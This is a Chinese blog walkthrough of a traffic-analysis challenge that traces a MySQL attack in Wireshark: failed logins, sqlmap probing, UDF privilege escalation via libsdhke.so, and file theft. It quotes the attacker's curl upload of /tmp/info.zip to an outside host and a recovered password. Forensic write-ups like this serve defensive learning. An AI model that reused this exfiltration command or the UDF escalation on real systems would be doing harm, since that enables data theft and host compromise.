分析一个流量包

embedded/2025/3/6 14:06:39/

问题:

  1. 攻击者登录Mysql失败多少次?提交答案例如:123
  2. 攻击者执行的第一个命令返回的结果是什么?提交的字符串例如:www-data
  3. 攻击者通过UDF提权的方式上传了一个插件,提交该插件的小写md5值。
  4. 该插件被写入到什么位置?提交答案例如:/usr/lib/mysql.elf
  5. 攻击者窃取了哪些文件?提交的文件名称全小写,并根据小写字母的顺序进行提交,例如:aa.txt-ab.txt-cc.txt
  6. 攻击者得知数据库中第一个用户的登录密码为?提交密码字符串。

在这里插入图片描述

1.攻击者登录Mysql失败多少次

使用mysql.error_code== 1045,如果忘记了这个命令可以先mysql.查看

在这里插入图片描述
然后看右下角显示140次
在这里插入图片描述

2.攻击者执行的第一个命令返回的结果是什么

我们可以利用上题发现的ip信息,来进一步过滤来追踪攻击者,要知道攻击者执行的第一个命令返回的结果是什么,那我们就得过滤1045的登录失败流量信息,先大体扫一遍,发现只有mysql是返回正常的
在这里插入图片描述
在这里插入图片描述
再过滤mysql
在这里插入图片描述
随便找一个Response ok的包,追踪tcp
在这里插入图片描述

发现SELECT DATABASE(),那么可以肯定的是,这个攻击者拿sqlmap扫了
再下一步查找的时候,发现很可疑的sys_eval,去解一下,发现执行了hostname -l,且回显ip
在这里插入图片描述

3.攻击者通过UDF提权的方式上传了一个插件,提交该插件的小写md5值

UDF提权关注.so文件,一搜索就知道了该文件名称libsdhke.so,再去一些在线加密的网站即可
在这里插入图片描述

4.该插件被写入到什么位置?

UDF提权的核心在于通过MySQL加载自定义的动态链接库(如 .dll 或 .so 文件),这些库中包含可以执行系统命令的函数。攻击者通过在MySQL中注册这些函数,然后调用它们来执行系统命令
那么就得关注那些 .so 文件或者 .dll 了
一搜就知道位置了
在这里插入图片描述

5.攻击者窃取了哪些文件?提交的文件名称全小写,并根据小写字母的顺序进行提交

再继续下滑的时候,分析此处,发现一个/tmp/info.zip 文件被创建,且包含 VPNUser 目录及其内容

在这里插入图片描述
继续分析
再此处,发现了一个文件上传的操作
在这里插入图片描述
操作如下

curl -F "file=@/tmp/info.zip" http://x.x.x.x:8831/

那么就可以确定,此处毫无疑问就是有问题的

6.攻击者得知数据库中第一个用户的登录密码

在这里我们可以知道攻击者找到了root用户,继续利用root分析
在这里插入图片描述

在此处已经登录上了root账号,那么得知密码一定在此处流量的上处

在这里插入图片描述
发现只有开头处的那一大串最可疑,对此处分析,发现包含了MySQL 连接信息和用户认证数据的日志。这段日志显示了 root 用户的认证方式和一些客户端连接的详细信息:

  1. MySQL 版本
    5.6.7-rc
    这是 MySQL 的版本号,表示当前运行的 MySQL 版本是 5.6.7
  2. 用户认证信息
    root…Q…T.qt.8]g.mysql.mysql_native_password
    用户名是 root。
    认证方式是 mysql_native_password,查询后得知,这是 MySQL 默认的密码哈希算法。
  3. 密码应该是
    !Sq9O0Bm&b"p.
  4. 客户端连接信息
    _client_name.pymysql._pid.14934._client_version.1.0.2
    这部分内容表明:
    客户端名称是 pymysql,这是一个 Python 的 MySQL 客户端库。
    客户端进程 ID 是 14934。
    客户端版本是 1.0.2。

小补充

在这里感谢小破站的清风拂月师傅分析的该流量包


http://www.ppmy.cn/embedded/170489.html

相关文章

⭐算法OJ⭐跳跃游戏【动态规划 + 单调队列】(C++实现)Jump Game 系列 VI

⭐算法OJ⭐跳跃游戏【贪心算法】(C实现)Jump Game 系列 I,II ⭐算法OJ⭐跳跃游戏【BFS滑动窗口】(C实现)Jump Game 系列 III,IIV 1696. Jump Game VI You are given a 0-indexed integer array nums and an integer k. You are…

在21世纪的我用C语言探寻世界本质——字符函数和字符串函数(2)

人无完人,持之以恒,方能见真我!!! 共同进步!! 文章目录 一、strncpy函数的使用二、strncat函数的使用三、strncmp函数的使用四、strstr的使用和模拟实现五、strtok函数的使用六、strerror和pe…

后路式编程

今天遇到一个问题,反馈的时候,已经提审过了,不能重新出包了。只能依赖Lua热更解决。非常巧的是,C#那边的变量全是Public的,这算是救了一命。想想确实可笑,本来是封装的问题,没有封装的太好。结果…

网络安全管理平台建设思路

🍅 点击文末小卡片 ,免费获取网络安全全套资料,资料在手,涨薪更快 为进一步明确计算机网络的管理部门和职责,保障计算机和网络的安全运行,特制定本管理规定.下面是学习啦小编跟大家分享的是有关计算机网络管…

如何保证域名网络安全性

如今,网络安全 问题日益受到众多网民的重视,在互联网上稍微疏忽就可能导致信息的泄露,再加上黑客这一以破坏他人良好体验感为乐的人存在,我们在互联网环境下一定要做好安全 保护措施。就以域名为例,域名注册后&#xf…

MyBatis框架之映射文件加载方式

在MyBatis框架中,映射文件(XML)的加载方式直接影响SQL与Java接口的绑定效率。以下是两种常用方式及其原理的详细说明: 一、通过resource属性加载XML映射文件 核心思想 直接通过XML配置文件逐一声明映射文件的相对路径&#xff0…

大数据与网络安全讲座

🍅 点击文末小卡片 ,免费获取网络安全全套资料,资料在手,涨薪更快 大数据的价值为大家公认。业界通常以4个“V”来概括大数据的基本特征——Volume(数据体量巨大)、Variety(数据类型繁多)、Value(价值密度低)、Velocity(处理速度快…

神经网络入门:分类与回归(3)

在代码清单4-8和代码清单4-9中,我们将使用Matplotlib在同一张图上绘制训练损失和验证损失(见图4-4),以及训练精度和验证精度(见图4-5)。由于模型的随机初始值不同,得到的结果可能会略有不同。 …